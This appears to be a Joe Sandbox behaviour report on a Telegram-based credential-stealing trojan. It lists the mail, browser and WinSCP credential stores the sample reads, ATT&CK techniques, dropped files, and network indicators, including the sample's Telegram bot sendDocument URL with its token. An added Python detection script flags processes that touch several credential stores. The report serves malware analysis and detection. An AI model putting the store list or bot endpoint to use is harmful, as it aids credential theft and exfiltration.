Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0123F53C GetUserNameW,

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Qasvjoldkyh.exe PID: 388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
Source: Yara match | File source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
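The file and registry accesses in this section are the high-signal part of the report: a single process walks the Thunderbird and Firefox profiles.ini files, the Outlook MAPI profile key, the IncrediMail identities key and the WinSCP saved sessions key, while the dropped Qasvjoldkyh.exe reads the Chrome Login Data database. The long run of "Queries volume information" lines above, by contrast, is the .NET loader probing GAC assemblies and is produced by any managed process, including the report's own powershell.exe instances, so it is not a usable indicator on its own. The following added example (not part of the Joe Sandbox report or of the sample) shows how a hunting rule can turn the access events into a per-process verdict: it parses the report lines, matches each opened path or key against a catalogue of credential stores, maps the hit to an ATT&CK technique, and flags any process that reads two or more unrelated stores. The event lines are copied from the report (with the Source and event fields separated) plus one benign control line; the store catalogue, technique mapping and threshold are this example's assumptions.

```python
"""Classify sandbox file/registry access events against known credential stores.

Added example, not part of the Joe Sandbox report. The event lines are copied
from the "Stealing of Sensitive Information" section (plus one benign control
line); the store catalogue, the ATT&CK mapping and the alert threshold are this
example's own assumptions.
"""
import re
from collections import defaultdict

# Constructed input: the report's access events, Source and event fields separated.
EVENTS = [
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini",
    r"Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    r"Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities",
    r"Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions",
    r"Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    # Benign control (constructed): a GAC assembly probe like those in the report; must not match any store.
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll",
]

# Credential-store catalogue (assumption of this example): regex over the opened
# path or registry key, store label, ATT&CK technique the access maps to.
STORES = [
    (r"\\Thunderbird\\profiles\.ini$", "Thunderbird profiles", "T1114.001 Local Email Collection"),
    (r"\\Windows Messaging Subsystem\\Profiles\\", "Outlook MAPI profiles", "T1552.002 Credentials in Registry"),
    (r"\\IncrediMail\\Identities$", "IncrediMail identities", "T1552.002 Credentials in Registry"),
    (r"\\WinSCP 2\\Sessions$", "WinSCP saved sessions", "T1552.002 Credentials in Registry"),
    (r"\\Chrome\\User Data\\.*\\Login Data$", "Chrome saved logins", "T1555.003 Credentials from Web Browsers"),
    (r"\\Mozilla\\Firefox\\profiles\.ini$", "Firefox profiles", "T1555.003 Credentials from Web Browsers"),
]

# One report line: "Source: <process image> File opened|Key opened: <path or key>".
EVENT_RE = re.compile(r"^Source: (?P<proc>.+?) (?P<kind>File opened|Key opened): (?P<target>.+)$")


def parse_event(line):
    """Split a report line into process, event kind and target; None for non-access lines."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(target):
    """Return (store, technique) if the opened path or key is a known credential store, else None."""
    for pattern, store, technique in STORES:
        if re.search(pattern, target, re.IGNORECASE):
            return store, technique
    return None


def summarize(lines):
    """Map each process image to the distinct credential stores it touched."""
    hits = defaultdict(set)
    for line in lines:
        event = parse_event(line)
        if not event:
            continue
        hit = classify(event["target"])
        if hit:
            hits[event["proc"]].add(hit)
    return {proc: sorted(stores) for proc, stores in hits.items()}


def flag_stealers(lines, min_stores=2):
    """Processes reading at least `min_stores` distinct stores. One store can have a
    legitimate owner (a mail client reading its own profile); several unrelated ones rarely do."""
    return sorted(proc for proc, stores in summarize(lines).items() if len(stores) >= min_stores)


if __name__ == "__main__":
    for proc, stores in summarize(EVENTS).items():
        print(proc)
        for store, technique in stores:
            print(f"  {store:<24} {technique}")
    print("flagged:", flag_stealers(EVENTS))
```

Run against the report's events, file.exe is flagged with five distinct stores while Qasvjoldkyh.exe, which only reads Chrome's Login Data, stays below the threshold; in a real deployment the threshold and the catalogue would be tuned per environment, and the browser and mail clients themselves would be allowlisted for their own stores.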

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Qasvjoldkyh.exe PID: 388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
Source: Yara match | File source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques with signature hits per tactic; the digit strings in parentheses are the report's hit badges as extracted)

Initial Access: no technique hits
Execution: Windows Management Instrumentation (211); PowerShell (1)
Persistence: Registry Run Keys / Startup Folder (11)
Privilege Escalation: Process Injection (112); Registry Run Keys / Startup Folder (11)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Masquerading (1); Virtualization/Sandbox Evasion (131); Process Injection (112); Hidden Files and Directories (1)
Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials in Registry (1)
Discovery: Account Discovery (1); File and Directory Discovery (1); System Information Discovery (114); Security Software Discovery (211); Process Discovery (2); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: no technique hits
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (111); Clipboard Data (1)
Exfiltration: no technique hits
Command and Control: Web Service (1); Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (14)
Network Effects: no technique hits
Remote Service Effects: no technique hits
Impact: no technique hits

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 830902  Sample: file.exe  Startdate: 20/03/2023  Architecture: WINDOWS  Score: 100
                  Start (node 2)
                    DNS/IP: api4.ipify.org (51); api.telegram.org (53); api.ipify.org (55)
                    Signatures: Snort IDS alert for network traffic (65); Multi AV Scanner detection for submitted file (67); Yara detected Telegram RAT (69); 5 other signatures (71)
                    Started: file.exe 1 8 (8); Qasvjoldkyh.exe 4 (12); kDPmkTm.exe 4 (14); 2 other processes (16)
                  file.exe (node 8)
                    Dropped: C:\Users\user\AppData\...\Qasvjoldkyh.exe, PE32 (45); C:\Users\...\Qasvjoldkyh.exe:Zone.Identifier, ASCII (47); C:\Users\user\AppData\Local\...\file.exe.log, ASCII (49)
                    Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) (85); May check the online IP address of the machine (87); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) (89); Creates multiple autostart registry keys (91)
                    Started: file.exe 17 5 (18); powershell.exe 15 (23); file.exe (25)
                  Qasvjoldkyh.exe (node 12)
                    Signatures: Multi AV Scanner detection for dropped file (93); Machine Learning detection for dropped file (95); Encrypted powershell cmdline option found (97)
                    Started: Qasvjoldkyh.exe (27); powershell.exe (29)
                  kDPmkTm.exe (node 14)
                    Signatures: Injects a PE file into a foreign processes (99)
                    Started: powershell.exe (31); kDPmkTm.exe (33)
                  file.exe (node 18)
                    DNS/IP: api4.ipify.org 104.237.62.211, 443, 49697, 49700 WEBNXUS United States (57); api.telegram.org 149.154.167.220, 443, 49698, 49702 TELEGRAMRU United Kingdom (59); 2 other IPs or domains (63)
                    Dropped: C:\Users\user\AppData\Roaming\...\kDPmkTm.exe, PE32 (41); C:\Users\user\...\kDPmkTm.exe:Zone.Identifier, ASCII (43)
                    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) (73); Tries to steal Mail credentials (via file / registry access) (75); Creates multiple autostart registry keys (77)
                  powershell.exe (node 23)
                    Started: conhost.exe (35)
                  Qasvjoldkyh.exe (node 27)
                    DNS/IP: api.ipify.org (61)
                    Signatures: Tries to harvest and steal browser information (history, passwords, etc) (79); Hides that the sample has been downloaded from the Internet (zone.identifier) (81); Installs a global keyboard hook (83)
                  powershell.exe (node 29)
                    Started: conhost.exe (37)
                  powershell.exe (node 31)
                    Started: conhost.exe (39)

                Source | Detection | Scanner | Label | Link
                file.exe | 36% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx |
                file.exe | 44% | Virustotal |  | Browse
                file.exe | 100% | Joe Sandbox ML |  |
                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | 100% | Joe Sandbox ML |  |
                C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | 100% | Joe Sandbox ML |  |
                C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | 36% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx |
                C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | 44% | Virustotal |  | Browse
                C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | 36% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx |
                Source | Detection | Scanner | Label | Link | Download
                15.2.Qasvjoldkyh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035 |  | Download File
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://api.telegram.org4 | 0% | URL Reputation | safe |
                https://api.telegram.org4 | 0% | URL Reputation | safe |
                https://api.ipify.org4 | 0% | URL Reputation | safe |
                https://urn.to/r/sds_see | 0% | URL Reputation | safe |
                http://james.newtonking.com/projects/json | 0% | URL Reputation | safe |
                http://www.microsoft.s | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                api4.ipify.org | 104.237.62.211 | true | false |  | high
                api.telegram.org | 149.154.167.220 | true | false |  | high
                api.ipify.org | unknown | unknown | false |  | high
                Name | Malicious | Antivirus Detection | Reputation
                https://api.ipify.org/ | false |  | high
                https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument | false |  | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://api.ipify.org | file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                https://api.telegram.org4 | file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
                http://www.microsoft.s | kDPmkTm.exe, 00000013.00000002.653315830.0000000006C60000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://api.telegram.org | file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                https://api.ipify.org4 | Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://www.newtonsoft.com/jsonschema | kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                https://www.newtonsoft.com/json | kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                https://www.nuget.org/packages/Newtonsoft.Json.Bson | file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                http://api4.ipify.org | Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/ | Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                https://urn.to/r/sds_see | file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://api.telegram.org | file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                http://james.newtonking.com/projects/json | kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://api.ipify.org | Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                149.154.167.220 | api.telegram.org | United Kingdom |  | 62041 | TELEGRAMRU | false
                104.237.62.211 | api4.ipify.org | United States |  | 18450 | WEBNXUS | false

                IP
                192.168.2.1
                                              Joe Sandbox Version:37.0.0 Beryl
                                              Analysis ID:830902
                                              Start date and time:2023-03-20 19:36:46 +01:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 37s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                               Number of new started processes analysed:20
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample file name:file.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@22/15@8/3
                                              EGA Information:
                                              • Successful, ratio: 100%
